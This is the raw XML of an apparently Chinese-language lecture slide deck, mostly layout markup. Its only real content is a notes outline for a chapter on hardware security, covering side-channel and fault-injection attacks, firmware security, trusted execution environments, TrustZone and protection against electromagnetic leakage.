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59"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="3808" r:id="rId2"/>
    <p:sldId id="395" r:id="rId3"/>
    <p:sldId id="3844" r:id="rId4"/>
    <p:sldId id="3856" r:id="rId5"/>
    <p:sldId id="3857" r:id="rId6"/>
    <p:sldId id="3878" r:id="rId7"/>
    <p:sldId id="3879" r:id="rId8"/>
    <p:sldId id="3847" r:id="rId9"/>
    <p:sldId id="3848" r:id="rId10"/>
    <p:sldId id="3849" r:id="rId11"/>
    <p:sldId id="3850" r:id="rId12"/>
    <p:sldId id="3851" r:id="rId13"/>
    <p:sldId id="3858" r:id="rId14"/>
    <p:sldId id="3859" r:id="rId15"/>
    <p:sldId id="3881" r:id="rId16"/>
    <p:sldId id="3882" r:id="rId17"/>
    <p:sldId id="3880" r:id="rId18"/>
    <p:sldId id="3883" r:id="rId19"/>
    <p:sldId id="3884" r:id="rId20"/>
    <p:sldId id="3885" r:id="rId21"/>
    <p:sldId id="3886" r:id="rId22"/>
    <p:sldId id="3887" r:id="rId23"/>
    <p:sldId id="3888" r:id="rId24"/>
    <p:sldId id="3889" r:id="rId25"/>
    <p:sldId id="3860" r:id="rId26"/>
    <p:sldId id="3890" r:id="rId27"/>
    <p:sldId id="3892" r:id="rId28"/>
    <p:sldId id="3895" r:id="rId29"/>
    <p:sldId id="3894" r:id="rId30"/>
    <p:sldId id="3896" r:id="rId31"/>
    <p:sldId id="3861" r:id="rId32"/>
    <p:sldId id="3898" r:id="rId33"/>
    <p:sldId id="3897" r:id="rId34"/>
    <p:sldId id="3900" r:id="rId35"/>
    <p:sldId id="3899" r:id="rId36"/>
    <p:sldId id="3901" r:id="rId37"/>
    <p:sldId id="3903" r:id="rId38"/>
    <p:sldId id="3904" r:id="rId39"/>
    <p:sldId id="3905" r:id="rId40"/>
    <p:sldId id="3906" r:id="rId41"/>
    <p:sldId id="3907" r:id="rId42"/>
    <p:sldId id="3862" r:id="rId43"/>
    <p:sldId id="3863" r:id="rId44"/>
    <p:sldId id="3864" r:id="rId45"/>
    <p:sldId id="3865" r:id="rId46"/>
    <p:sldId id="3866" r:id="rId47"/>
    <p:sldId id="3867" r:id="rId48"/>
    <p:sldId id="3868" r:id="rId49"/>
    <p:sldId id="3869" r:id="rId50"/>
    <p:sldId id="3870" r:id="rId51"/>
    <p:sldId id="3871" r:id="rId52"/>
    <p:sldId id="3872" r:id="rId53"/>
    <p:sldId id="3873" r:id="rId54"/>
    <p:sldId id="3874" r:id="rId55"/>
    <p:sldId id="3876" r:id="rId56"/>
    <p:sldId id="3875" r:id="rId57"/>
    <p:sldId id="3877" r:id="rId5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11" autoAdjust="0"/>
    <p:restoredTop sz="76545" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="160" d="100"/>
          <a:sy n="160" d="100"/>
        </p:scale>
        <p:origin x="1800" y="168"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="85" d="100"/>
        <a:sy n="8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31.jpeg>
</file>

<file path=ppt/media/image32.jpeg>
</file>

<file path=ppt/media/image33.jpeg>
</file>

<file path=ppt/media/image34.jpeg>
</file>

<file path=ppt/media/image35.png>
</file>

<file path=ppt/media/image36.png>
</file>

<file path=ppt/media/image37.png>
</file>

<file path=ppt/media/image38.jpeg>
</file>

<file path=ppt/media/image39.jpe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jpeg>
</file>

<file path=ppt/media/image50.png>
</file>

<file path=ppt/media/image51.png>
</file>

<file path=ppt/media/image52.png>
</file>

<file path=ppt/media/image53.png>
</file>

<file path=ppt/media/image54.png>
</file>

<file path=ppt/media/image55.jpeg>
</file>

<file path=ppt/media/image56.png>
</file>

<file path=ppt/media/image57.png>
</file>

<file path=ppt/media/image58.png>
</file>

<file path=ppt/media/image59.jpeg>
</file>

<file path=ppt/media/image6.png>
</file>

<file path=ppt/media/image60.jpeg>
</file>

<file path=ppt/media/image61.png>
</file>

<file path=ppt/media/image62.png>
</file>

<file path=ppt/media/image63.png>
</file>

<file path=ppt/media/image64.jpeg>
</file>

<file path=ppt/media/image65.jpeg>
</file>

<file path=ppt/media/image66.png>
</file>

<file path=ppt/media/image67.png>
</file>

<file path=ppt/media/image68.jpeg>
</file>

<file path=ppt/media/image69.jpeg>
</file>

<file path=ppt/media/image7.png>
</file>

<file path=ppt/media/image70.png>
</file>

<file path=ppt/media/image71.jpeg>
</file>

<file path=ppt/media/image72.png>
</file>

<file path=ppt/media/image73.jpeg>
</file>

<file path=ppt/media/image74.jpeg>
</file>

<file path=ppt/media/image75.png>
</file>

<file path=ppt/media/image76.png>
</file>

<file path=ppt/media/image77.png>
</file>

<file path=ppt/media/image78.png>
</file>

<file path=ppt/media/image79.jpeg>
</file>

<file path=ppt/media/image8.png>
</file>

<file path=ppt/media/image80.jpeg>
</file>

<file path=ppt/media/image81.jpeg>
</file>

<file path=ppt/media/image82.jpeg>
</file>

<file path=ppt/media/image83.jpeg>
</file>

<file path=ppt/media/image84.jpeg>
</file>

<file path=ppt/media/image85.png>
</file>

<file path=ppt/media/image86.png>
</file>

<file path=ppt/media/image87.jpeg>
</file>

<file path=ppt/media/image88.jpeg>
</file>

<file path=ppt/media/image89.jpeg>
</file>

<file path=ppt/media/image9.png>
</file>

<file path=ppt/media/image90.jpeg>
</file>

<file path=ppt/media/image91.png>
</file>

<file path=ppt/media/image92.jpeg>
</file>

<file path=ppt/media/image93.jpeg>
</file>

<file path=ppt/media/image94.jpeg>
</file>

<file path=ppt/media/image9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BCCE95-9802-FF4D-BF14-C0BADA9BA38E}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2021/1/11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905F7E-8FCD-B247-8658-9B89ABB1145E}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18896909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0905F7E-8FCD-B247-8658-9B89ABB1145E}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29047073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921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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="922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Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203"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8424E46-9E8B-4FAB-9DE0-1CB38AB4711F}" type="slidenum">
              <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2735745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自强 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>6.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>硬件安全技术概述 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>6.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>硬件攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>6.2.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>侧信道攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>6.2.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>故障注入攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>6.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>硬件安全框架</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>6.3.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>固件安全</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>6.3.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>可信执行环境</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>6.3.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>信任区域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TrustZone</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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6.3.4  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>防电磁泄漏</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C0905F7E-8FCD-B247-8658-9B89ABB1145E}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4327337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0905F7E-8FCD-B247-8658-9B89ABB1145E}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2557019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0905F7E-8FCD-B247-8658-9B89ABB1145E}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2910291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0905F7E-8FCD-B247-8658-9B89ABB1145E}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8448195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1131376" y="136525"/>
            <a:ext cx="10222424" cy="725407"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="直接连接符 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1942919-E2AA-9144-9848-EF0AF6C4B994}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923477" y="801349"/>
            <a:ext cx="10910714" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="65000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ED7C839-2291-4446-A47F-F7E8955E03CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="225546" y="136525"/>
            <a:ext cx="697931" cy="708097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:reflection blurRad="6350" stA="50000" endA="300" endPos="38500" dist="50800" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10246366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05B155A-6C3F-4654-B89E-25DB213E399B}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2021/1/11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15CE2E0-6DDF-4FAE-9DBA-F1C48BF5C133}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3192423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192000" cy="6858000"/>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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="913765" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2355" dirty="0" err="1">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="FFFFFF"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FFFFFF"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="0"/>
              </a:gradFill>
              <a:latin typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>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015499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8955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id="{A04EDDA3-E2AB-904A-BB85-4CC282BF9173}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3503376" y="1836078"/>
            <a:ext cx="8688625" cy="279632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Arial"/>
              <a:ea typeface="微软雅黑 Light"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F51A0AAD-98DC-B248-9BA5-E40C2E1B5E7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4815704" y="1481206"/>
            <a:ext cx="7376296" cy="354873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="ltUpDiag">
            <a:fgClr>
              <a:schemeClr val="accent1"/>
            </a:fgClr>
            <a:bgClr>
              <a:srgbClr val="E8E8E6"/>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Arial"/>
              <a:ea typeface="微软雅黑 Light"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FD70DE7-28CD-E242-B63B-A52835CB736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1088" y="1488810"/>
            <a:ext cx="4835696" cy="3143587"/>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5087756" y="2486887"/>
            <a:ext cx="6923430" cy="1470025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5258597" y="5194231"/>
            <a:ext cx="6581747" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>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8000" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3657600" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="4267200" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4876800" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑母版副标题样式</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5E137E13-6931-4ECB-BB5B-849FB74182C0}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2021/1/11</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23CBF4B4-C160-4F55-AC7D-1C8FF5BA05FA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138156813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5B155A-6C3F-4654-B89E-25DB213E399B}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
